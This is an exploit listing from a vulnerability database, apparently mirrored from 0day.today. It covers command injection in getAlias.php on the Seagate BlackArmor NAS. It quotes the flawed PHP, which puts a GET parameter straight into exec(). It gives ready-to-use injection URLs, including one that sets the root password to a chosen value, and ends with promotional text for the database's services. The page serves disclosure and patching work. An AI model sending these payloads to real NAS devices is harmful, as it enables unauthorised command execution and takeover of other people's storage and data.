Lucene search
K

Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution

🗓️ 06 Jan 2014 00:00:00Reported by Jeroen-ITNerdboxType 
zdt
 zdt
🔗 0day.today👁 33 Views

Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution vulnerability in getAlias.php allows unauthorized command execution

Related
Code
# The file getAlias.php located in /backupmgt has the following lines:
 
#
 
# $ipAddress = $_GET["ip";
 
# if ($ipAddress != "") {
 
#    exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
 
#    ..
 
#    ..
 
# }
 
#
 
# The GET parameter can easily be manipulated to execute commands on the
BlackArmor system.
 
#
 
## Proof of Concept:
 
#
 
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your
command here>;
 
#
 
## Example to change the root password to 'mypassword':
 
#
 
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
'mypassword' | passwd --stdin;

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jan 2014 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.48357
33